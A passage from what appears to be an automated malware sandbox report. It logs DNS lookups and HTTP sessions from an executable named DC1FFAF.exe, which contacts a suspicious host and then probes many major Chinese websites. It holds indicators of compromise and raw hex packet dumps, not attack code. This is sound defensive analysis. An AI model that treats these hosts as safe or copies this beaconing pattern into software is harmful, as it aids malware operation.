                                                                                                                                    Aug 6, 2024 10:30:16.093761921 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:16.093761921 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:16.487037897 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:16.487037897 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:23.715434074 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:23.715434074 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:23.954931974 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:23.954931974 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:34.259304047 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:34.259304047 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:36.282016993 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:36.282016993 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • vip.baxingfz.com
                                                                                                                                    • www.baidu.com
                                                                                                                                    • www.qq.com
                                                                                                                                    • www.sina.com.cn
                                                                                                                                    • www.jd.com
                                                                                                                                    • www.sogou.com
                                                                                                                                    • www.so.com
                                                                                                                                    • youdao.com
                                                                                                                                    • www.1688.com
                                                                                                                                    • soso.com
                                                                                                                                    • www.hao123.com
                                                                                                                                    • www.eastmoney.com
                                                                                                                                    • www.jmw.com.cn
                                                                                                                                    • www.cdstm.cn
                                                                                                                                    • foodmate.net
                                                                                                                                    • www.tencent.com
                                                                                                                                    • www.hupu.com
                                                                                                                                    • www.cctv.com
                                                                                                                                    • xianggangcs.oss-accelerate.aliyuncs.com
                                                                                                                                    • www.jb51.net
                                                                                                                                    • www.autohome.com.cn
                                                                                                                                    • www.zhihu.com
                                                                                                                                    • sinacloud.net
                                                                                                                                    • yanzheng.appchizi.com
                                                                                                                                    • www.kuaishou.com
                                                                                                                                    • www.douyin.com
                                                                                                                                    • www.sohu.com
                                                                                                                                    • zhangjiakoucs.oss-accelerate.aliyuncs.com

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.64971343.154.89.23680420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:14.943634987 CEST410OUTGET / HTTP/1.1
                                                                                                                                    Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
                                                                                                                                    Accept-Language: en-CH
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                    Host: vip.baxingfz.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:15.849750042 CEST1236INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:15 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Upgrade: h2
                                                                                                                                    Connection: Upgrade, close
                                                                                                                                    Last-Modified: Sun, 21 Jan 2024 01:11:31 GMT
                                                                                                                                    ETag: "a2f-60f6a64bbb3b1-gzip"
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Content-Length: 1334
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 56 6d 6b db 56 14 fe 1e c8 7f b8 a8 0c da 0f b6 24 bf c5 96 6c 43 92 c6 8d 21 6b a1 0b 8c ed cb 90 ad 6b 5b ab 2c b9 d2 75 9d 17 fa 63 1c d1 35 ac d9 16 37 75 d2 d8 4e 9b 26 69 ea 66 c4 76 1a 47 eb 0b 14 ca 46 19 83 0c 5a 4a 53 c2 3a 76 af 22 c7 76 93 76 ed 98 6d cc d5 bd cf 3d e7 3c cf 3d e7 5c 05 f5 b8 26 65 50 18 90 4f 6f 8f 20 43 0d 9d a4 36 a7 cd ef 8d d2 cd 46 a3 dc 58 59 ae 6f af 96 af 3e 28 9b 85 f9 e6 6c b3 71 ef e6 b4 b9 5f 5c 33 af ce 99 c6 4c fd e9 46 c1 dc b9 bf 7b 7b ba fc e7 fc 4f c6 cc 6a f9 7a ad b2 5d 5c fb e5 ca d2 ab f2 7e f9 99 31 d3 fc a1 f2 c4 13 08 9c 3f 40 e1 1d 66 f3 b1 59 6e fc ee c6 73 c6 4c f1 d7 f2 de 62 69 e5 e5 9d 1b 4b db 5b f9 03 8c 79 f5 e6 3c 75 8a 3f 8c a5 e5 73 e3 71 75 ba be bf f1 64 f3 cd ce 2d a3 94 cb e5 9c 31 61 4c 52 92 89 09 67 5c 4d 83 8e 89 ec 44 2a 7b 38 e7 67 02 4c fc 62 0b 94 ec 0b f8 ad 91 b5 96 4b ba 18 c6 7a b4 1c 06 69 5b 0c 3c d4 d1 b8 0c 01 1a cf c0 10 85 e0 18 a2 e3 ba 4e 85 89 44 31 55 1c 9f 4c a8 0a 72 24 84 [TRUNCATED]
                                                                                                                                    Data Ascii: VmkV$lC!kk[,uc57uN&ifvGFZJS:v"vvm=<=\&ePOo C6FXYo>(lq_\3LF{{Ojz]\~1?@fYnsLbiK[y<u?squd-1aLRg\MD*{8gLbKzi[<ND1ULr$$s6U[zf;D>>-hIId+v $2g|\U;H$aL!0@m2,Ap9NfQpx6$a\$-49<K8caK"3L<tF8j6qNP\y6J0<,TY(UQg-wBUQ;c\GK2rXm82I3G)k)2t5$uT*1J6Die5$Y<Wu(8UZVe9ab;(J@\t=DUxPVZS &r1mJHc(1.I#awsgGE(DCp1Htdt< ;/G9`u0xn0~7FgC3rc!ytv`?H\_?po><(m/<ppGc1:Vt21
                                                                                                                                    Aug 6, 2024 10:29:15.849786043 CEST405INData Raw: a2 95 10 36 0a 46 a9 f4 6a ee 75 b5 5a f9 cb 28 45 f1 d9 68 28 3f 35 ac a6 61 7e aa 5a db ca e3 d3 15 b0 a3 cc b1 7b af 1b 25 72 a5 14 af 98 b3 0f 8a 24 c6 33 10 d2 67 d4 34 3d 02 93 f4 80 9c 85 74 b1 6a ee dd d9 2b de 5b a9 ac ef 7d c8 d2 9c 51
                                                                                                                                    Data Ascii: 6FjuZ(Eh(?5a~Z{%r$3g4=tj+[}QjQ^-o7+rnZf]';%cfYI/:l#9/yDeq{,W7{}0^^-o.VVw+;o{B4:Jc9!*Pwo


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.649715103.235.46.9680420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.441920042 CEST219OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.baidu.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.382340908 CEST1236INHTTP/1.1 200 OK
                                                                                                                                    Bdpagetype: 1
                                                                                                                                    Bdqid: 0xb7009d24005c5789
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                    P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                    Server: BWS/1.1
                                                                                                                                    Set-Cookie: BAIDUID=BFD17A804D36F2FA10FCCF64F1D4CEAF:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                    Set-Cookie: BIDUPSID=BFD17A804D36F2FA10FCCF64F1D4CEAF; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                    Set-Cookie: PSTM=1722932957; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                    Set-Cookie: BAIDUID=BFD17A804D36F2FA14087B1D0F698523:FG=1; max-age=31536000; expires=Wed, 06-Aug-25 08:29:17 GMT; domain=.baidu.com; path=/; version=1; comment=bd
                                                                                                                                    Set-Cookie: BDSVRTM=32; path=/
                                                                                                                                    Set-Cookie: BD_HOME=1; path=/
                                                                                                                                    Traceid: 1722932957345081242613186712486891247497
                                                                                                                                    X-Ua-Compatible: IE=Edge,chrome=1
                                                                                                                                    X-Xss-Protection: 1;mode=block
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Data Raw: 37 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 69 93 1c 4b 72 18 f8 1d bf a2 d8 6d 43 00 53 5d f7 dd 18 3c b2 4f a0 71 74 17 fa 00 1a cd 37 db 96 95 95 59 55 e8 ba ba b2 aa fa 12 cc 48 69 47 94 56 cb cb 68 92 6c 45 ae 76 49 33 ad ed 9a ed 0e 29 5b 6a c5 25 45 f2 c7 68 de 9b 99 4f fb 17 d6 dd 23 22 33 ae ac a3 d1 20 25 33 bd 7a 00 aa 32 e3 f0 f0 f0 f0 f0 f0 2b 7e f4 2b db 07 5b c7 1f eb 3b 89 f6 b8 d7 fd e6 47 bf 92 4a 1d 1d 6f 1c 9f 1c 25 0e 5e a7 52 df fc 88 3d 6d 7b 4e f3 9b 1f f5 bc b1 03 c5 c6 c3 94 77 39 e9 4c 9f af 6c 0d fa 63 af 3f
                                                                                                                                    Data Ascii: 71ciKrmCS]<Oqt7YUHiGVhlEvI3)[j%EhO#"3 %3z2+~+[;GJo%^R=m{Nw9Llc?
                                                                                                                                    Aug 6, 2024 10:29:17.382364035 CEST1236INData Raw: 4e 1d df 0c bd 95 84 cb 7e 3d 5f 19 7b d7 e3 0c 56 7c e6 b6 9d 51 e0 8d 9f 4f c6 7e aa ba 62 69 e1 34 75 b2 91 da 1a f4 86 ce b8 d3 e8 ca 8d ec ed 3c f7 9a 2d 6f cd 6d 8f 06 3d ef 79 4e d4 0e 7b 71 ba 57 ce 4d b0 92 e8 3b f0 7a 65 e4 f9 de 68 e4
                                                                                                                                    Data Ascii: N~=_{V|QO~bi4u<-om=yN{qWM;zehD1tz^t#US6u/'Ow?g?7_???wo/~/g?~_?
                                                                                                                                    Aug 6, 2024 10:29:17.382375002 CEST1236INData Raw: b0 1f 95 76 d9 08 81 e1 59 26 fb aa dd 19 7b 29 20 45 d7 03 1e 71 35 72 86 cf b4 65 fd 39 16 a4 04 e0 9b 2f af 1c a0 ef 19 5f 3d f4 9d 63 b5 02 58 45 cc c2 e2 4b 64 9f 01 bf 80 1d d7 e9 02 72 3a ad fe 7a 0f d8 46 d7 9b d1 3e ae 90 3b 0e 3d 21 18
                                                                                                                                    Data Ascii: vY&{) Eq5re9/_=cXEKdr:zF>;=!hT$qXxa ~f&:SH2Q8IKY,<W+pV3CR1T;P<>ydFlneEtx"g/HEYi.ws(~?r6tSS/>)qEwo
                                                                                                                                    Aug 6, 2024 10:29:17.382385015 CEST672INData Raw: 2e 57 4a aa c4 a3 4a 26 34 86 59 13 b8 d0 18 12 69 50 47 71 43 06 a9 9a d7 66 53 2b e0 1a 46 ce 6a b5 3b a8 26 bc a1 6a 42 09 c2 86 22 0d 24 9f cf 2f 06 08 a9 52 94 d1 2f 56 af c1 44 52 53 ff b5 40 cf b2 6e 53 57 5f 22 ef b6 c9 97 62 86 6a b9 5a
                                                                                                                                    Data Ascii: .WJJ&4YiPGqCfS+Fj;&jB"$/R/VDRS@nSW_"bjZi`woD+njyMdv7Vug^Ly4gf*berr-!a5v#gk5[ZOoY6,O8$-?gARms9.bzu?X'i
                                                                                                                                    Aug 6, 2024 10:29:17.382390976 CEST1236INData Raw: 0c 20 ca d8 00 8c 93 d5 fd 10 a1 35 bb be de f0 c0 15 05 d7 2d f9 fe ad af ac 70 33 53 01 27 88 e3 89 be db 55 7f 59 4e f2 a0 36 64 8a 0c ee 26 20 38 af e4 2f a0 c8 2e 65 7d e9 a3 ff cb 62 9b a3 86 f1 68 44 b0 99 5b d9 30 a9 c5 48 9f ce 68 99 34
                                                                                                                                    Data Ascii: 5-p3S'UYN6d& 8/.e}bhD[0Hh420^TAQN-K"1y_,Jm|{(;4^Hd^=:cS<ta[r9<}q_P3;3")E /pZ")OJSm8IWj
                                                                                                                                    Aug 6, 2024 10:29:17.382402897 CEST1236INData Raw: 02 f3 ef 8a a4 4f be d0 91 05 59 0c dd 62 07 01 c2 1c 37 e5 76 e9 50 4f c4 1a 2d 8c d5 80 bc 1f 66 35 f3 ac 07 c7 d8 b0 73 dc 90 1e 09 87 a9 50 89 46 eb 86 8e 07 68 83 1b 82 c7 4b 00 6e 16 de dd b9 f0 0b e1 1b 48 81 3c c1 58 49 e1 76 a1 54 58 b2
                                                                                                                                    Data Ascii: OYb7vPO-f5sPFhKnH<XIvTX|x9@d%F|^<D(5&^G$Tiis 9w@XI<UsF\U8s5)li.5X0,ra``%
                                                                                                                                    Aug 6, 2024 10:29:17.382415056 CEST1236INData Raw: 41 c4 a4 7e d0 e8 f3 1e d9 1a d4 91 0e 23 c9 4c 4a d2 31 73 24 c0 5c 83 73 8c 6f 3d 67 de 80 3a e3 96 cf 71 11 ef 47 d5 62 22 95 cf 83 20 47 db 9a d2 c4 39 85 ca 72 c3 4e 81 d4 08 aa 56 00 04 74 f9 50 4d b1 e6 ca 7e 85 db a9 60 ac f8 5d 15 df 73
                                                                                                                                    Data Ascii: A~#LJ1s$\so=g:qGb" G9rNVtPM~`]sL|sYi,6c!(b}Ysc,Vt~{x1,ywjBc a`8>|T\KA~nJ*$J(NJ;qSJ<?%.[SQbcIuWeg_'C
                                                                                                                                    Aug 6, 2024 10:29:17.382457018 CEST1236INData Raw: 30 13 15 28 84 05 1c a7 96 05 87 46 24 28 06 63 ab e7 d0 99 79 1d 13 c8 65 90 79 27 f4 54 2e 51 71 26 15 50 71 54 4a 66 d0 c0 37 a3 78 a3 d3 62 6d 2f 52 38 18 7a 2e b8 ab b1 0a b8 13 65 f0 64 31 a3 f5 9e 07 c9 6d 98 6f 27 a9 ef 33 b8 2d ce 2a 4f
                                                                                                                                    Data Ascii: 0(F$(cyey'T.Qq&PqTJf7xbm/R8z.ed1mo'3-*OXygNyy`?TGh?(GOWXODb$Nz1T-z~at3^DWz+q6j!SeqWAJ+SgDlIn~Y+s~}R#_-]r
                                                                                                                                    Aug 6, 2024 10:29:17.382468939 CEST1236INData Raw: aa 6b bc 2d 14 d2 70 f2 a7 ff c2 f9 4d 41 5c 19 8f b7 e0 8d 80 b3 48 be 14 bd bf d6 df 57 a4 97 37 fa cb 72 39 0d e1 26 f8 5f 25 6a 22 72 6c 13 70 e6 6c c5 6e 8d c6 f2 69 a9 2f e6 55 60 2e 6c 41 a9 5c aa c3 7b 49 14 36 2d b6 26 44 2a 6b 83 5b 25
                                                                                                                                    Data Ascii: k-pMA\HW7r9&_%j"rlplni/U`.lA\{I6-&D*k[%cH[R8!Ji/+()[}$1{%Zo'=[e,8X--R"9> PxC4CEKx%\,PH^gRv8p/W}vFqzJ^
                                                                                                                                    Aug 6, 2024 10:29:17.382481098 CEST1236INData Raw: f2 8a 63 a5 66 40 57 6d e6 1b 72 ce de e5 a0 2b 4b 19 ce 24 b6 81 1e 57 16 c0 dc 42 be 52 54 8b cd 80 ac ec 16 9b 95 7b e3 8d fa b2 e1 8d 7c e8 4c e0 24 87 38 be 72 9c 9b 78 e0 9a 0d fc dc 17 38 d6 97 0d b8 26 84 3d c1 5d b4 b6 55 e1 ba 78 37 73
                                                                                                                                    Data Ascii: cf@Wmr+K$WBRT{|L$8rx8&=]Ux7s=Ex\UQ-vCT/[Bxw`UeuJ%u"&"ZJ]4zRQDHhkit B41[/PvP'9E,FZ@zH&dwER;xPTrB5ZF
                                                                                                                                    Aug 6, 2024 10:29:17.387351990 CEST1236INData Raw: 30 cb 7d 7c e3 08 8e 92 05 dc 34 fa 52 46 32 3e 52 f2 d0 c1 df 8a 86 1f 5d fb a5 53 00 1e 0a 4c 18 64 13 39 f5 1a 65 ba 65 69 c2 01 df 22 cd ff 9d dc 3c 4b c7 b4 1a 4c 60 1d c3 6d 48 e7 20 3e 43 fe 36 fe 03 ee da 66 3f cc 15 ce 02 ab e4 4c 70 3a
                                                                                                                                    Data Ascii: 0}|4RF2>R]SLd9eei"<KL`mH >C6f?Lp:ql3q)0$6gf^6"\\T3BI_OV!5D</e["y]1O]5BV*'bCW%q5'rd~n e}U%L_Neg


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.64971643.152.186.10380420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.502197027 CEST216OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.qq.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.444195032 CEST368INHTTP/1.1 302 Found
                                                                                                                                    Server: stgw
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Location: https://www.qq.com/
                                                                                                                                    Content-Length: 137
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:16 GMT
                                                                                                                                    EO-LOG-UUID: 6437863488832290852
                                                                                                                                    EO-Cache-Status: MISS
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 73 74 67 77 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>stgw</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.649718163.181.42.24580420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.582067966 CEST221OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.sina.com.cn
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.521696091 CEST581INHTTP/1.1 302 Found
                                                                                                                                    Server: Tuser
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 242
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.sina.com.cn/
                                                                                                                                    X-DSL-CHECK: 5
                                                                                                                                    X-Via-CDN: f=aliyun,s=ens-cache2.sg27,c=8.46.123.33;
                                                                                                                                    Via: ens-cache2.sg27[,0]
                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                    EagleId: a3b52a9617229329573756027e
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 72 65 73 69 64 65 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 64 65 72 20 61 20 64 69 66 66 65 72 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>302 Found</h1><p>The requested resource resides temporarily under a different URI.</p><hr/>Powered by Tuser</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.649717163.171.132.11980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.582161903 CEST216OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.jd.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.207083941 CEST342INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: Cdn Cache Server V2.0
                                                                                                                                    Location: https://corporate.jd.com/home
                                                                                                                                    X-Via: 1.0 PSdgflkfFRA2po75:8 (Cdn Cache Server V2.0)
                                                                                                                                    X-Ws-Request-Id: 66b1dedd_PSdgflkfFRA2po75_18721-39482
                                                                                                                                    Strict-Transport-Security: max-age=31536000


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.649719119.28.109.13280420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.589728117 CEST219OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.sogou.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.654800892 CEST564INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Set-Cookie: ABTEST=0|1722932957|v17; expires=Thu, 05-Sep-24 08:29:17 GMT; path=/
                                                                                                                                    P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                    Location: https://www.sogou.com/
                                                                                                                                    UUID: aa6dbd0e-1d36-469a-9c78-36f202af5feb
                                                                                                                                    Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 8a<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.649720104.192.110.22680420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.591334105 CEST216OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.so.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.112581968 CEST425INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: openresty/1.15.8.3
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.so.com/
                                                                                                                                    Set-Cookie: QiHooGUID=; Max-Age=63072000; Domain=so.com; Path=/
                                                                                                                                    Data Raw: 38 65 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 8e<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.649721111.124.200.10180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:16.758600950 CEST216OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: youdao.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:21.430979967 CEST199INHTTP/1.1 307 Temporary Redirect
                                                                                                                                    Server: YDWS
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:21 GMT
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://youdao.com/
                                                                                                                                    Data Raw: 31 33 0d 0a 68 74 74 70 73 3a 2f 2f 79 6f 75 64 61 6f 2e 63 6f 6d 2f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 13https://youdao.com/0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
